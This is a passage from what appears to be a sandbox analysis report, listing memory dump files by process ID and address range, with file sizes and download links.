            • memory/3056-133-0x0000020E7DA70000-0x0000020E7DA72000-memory.dmp

              Filesize

              8KB

              Download

            • memory/3056-121-0x0000020E001E0000-0x0000020E001E1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3104-162-0x0000000000AB0000-0x0000000000BF5000-memory.dmp

              Filesize

              1.3MB

              Download

            • memory/3104-150-0x0000000000000000-mapping.dmp

              Download

            • memory/3160-164-0x0000000000000000-mapping.dmp

              Download

            • memory/3336-175-0x0000000000000000-mapping.dmp

              Download

            • memory/3460-166-0x0000000000000000-mapping.dmp

              Download

            • memory/3696-177-0x0000000000000000-mapping.dmp

              Download

            • memory/4180-114-0x0000000000000000-mapping.dmp

              Download

            • memory/4224-205-0x0000000000000000-mapping.dmp

              Download

            • memory/4332-168-0x0000000000000000-mapping.dmp

              Download

            • memory/4336-167-0x0000000000000000-mapping.dmp

              Download

            • memory/4480-165-0x0000000000000000-mapping.dmp

              Download

            • memory/4516-170-0x0000000000000000-mapping.dmp

              Download

            • memory/4516-176-0x0000000000AD0000-0x0000000000C15000-memory.dmp

              Filesize

              1.3MB

              Download

            • memory/4564-169-0x0000000000000000-mapping.dmp

              Download

            • memory/4736-174-0x0000000000000000-mapping.dmp

              Download

            • memory/4740-172-0x0000000000000000-mapping.dmp

              Download